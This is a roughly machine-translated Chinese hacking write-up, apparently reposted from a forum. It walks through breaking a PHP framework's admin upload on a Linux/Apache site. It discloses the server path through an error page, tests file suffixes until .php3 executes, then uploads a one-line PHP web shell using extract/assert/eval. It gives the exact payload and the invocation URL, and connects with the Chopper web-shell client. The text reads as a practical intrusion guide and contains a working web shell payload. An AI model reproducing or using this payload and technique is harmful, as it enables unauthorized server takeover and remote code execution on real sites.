"Frame upload breakthrough" a linux+php frame upload breakthrough

Reprint: http://tieba.baidu.com/p/4480493887

Background:
Test.com/y/?m=qidianadmin&d=3

"Information Detection" ↓
-----------------------------------------------Information Detection------------------------------------------------------

Basically determined from the link is the framework written

Review elements look at the next platform, Apache is basically determined to be PHP

Fault-tolerant do poorly, access KS_INC/CONN.PHP?A=SDGSDHJGKJSDGD burst physical path
/www/users/jxxxxx.com/ks_inc/conn.php


Get directory/ks_inc
Linux system +php Framework breakthrough upload, you may need some access to the path. Otherwise, it may cause non-resolution.

---------------------------------------------------Information Detection--------------------------------------------------

Background homepage as follows; 1



First look at the next site settings do not have sensitive features, then find the upload.
"Upload point Situation"
Bring your own upload +FCK editor
FCK basically do not look, it is difficult to match Apache with the shell. And it's a high version.

With the upload is also the framework, upload can not catch the package, only the overall submission line (Falcon can be XSS to get backstage is not easy, the general framework is automatically escaped).

Upload a normal picture first and return to the following ↓

http://www. Test com/5df209c2-169c-4acb-9c78-a4bbc6823675
With no suffix, just a preview effect.

After the whole submission, the previous uploaded picture returns the path as follows ↓
/u/20160414/161042228331767761754-5135-77-20.jpg

OK, the real generated file is in the overall commit, the front is just a preview of the role.


So I uploaded it in the press, 2↓



"Post Package Contents"
Package 3, 4, 5↓




"Get Information" ↓
Post Submission Address: M=qidianadmin&d=3&ifr=1&st=60&c=info_edit

Here qidianadmin as a file can not move, there are a few parameters: D, IFR, C,

There are no parameters to control the path and file, the test finds that the Info_edit parameter is immutable, or the upload fails.
Other parameters basic control of the news type, meaningless.

With a cookie, it's no use.

The following news content parameter controls the news content, which is meaningless for the path and file name.

Here's a parameter.
Name= "Newdate"

0000-00-00

This is basically the random value that corresponds to the file name after uploading.
Similar to this: 5135-77-20

After the deletion is still normal upload, modified no exception.


Directly upload PHP is not allowed, here directly modified to PHP submission. Change the code to make it easy to observe ↓6




Take a look at the content of the news list ↓7




Review elements to see the next path, the picture path has been set to the site root path, access to the site home.

Test
1. Upload the normal picture to see the results
Result: The picture shows normal, the return path is:/u/20160414/161042252360541709029-5135-77-20.jpg 8↓






2. Change to ASP suffix
Result: Same as PHP results, no path, upload failed.

3. Instead of identifying suffix aaaa such as 9↓






Result: The access does not resolve, the direct prompt to download. In addition, it is true that the site is a. aaaa suffix and is displayed as a picture.


Then try to use PHP4 php1 ashx CDX, all without parsing, prompting for download.


When you try to php3 suffix, the picture is displayed normally. Visit 10↓



Basic determination as PHP to parse.


The following directly in the package inserted a sentence, the result is an error. Change a few functions of a word also not, and finally inserted a word to solve.

Insert:
<?php Extract ($_get). $a ($b [0]);? >
This is a extract function, pseudo-global should be no problem.



Get the path after uploading
Http://www.test.com/u/20160414/161042308159154391974-5201-77-20.php3

To add parameter access
Http://www.test.com/u/20160414/161042308159154391974-5201-77-20.php3?a=assert&b[0]=eval ($_POST[yebaqi5]);


12↓




Chopper Connection: Http://www.test.com/u/20160414/161042308159154391974-5201-77-20.php3?a=assert&b

[0]=eval ($_post[yebaqi5]);

13↓





All right, get the shell.


Summary
Break through the framework of PHP upload, or to cooperate with a variety of platform to build the analytic characteristics, although I have no way to cooperate. This Apache parsing into a script directly to the homepage, upload pphphp learned that unfiltered, or configuration problems.


Basically the frame writes the upload, how many have the question, basically all is the suffix question.

"Frame upload breakthrough" once linux+php frame upload breakthrough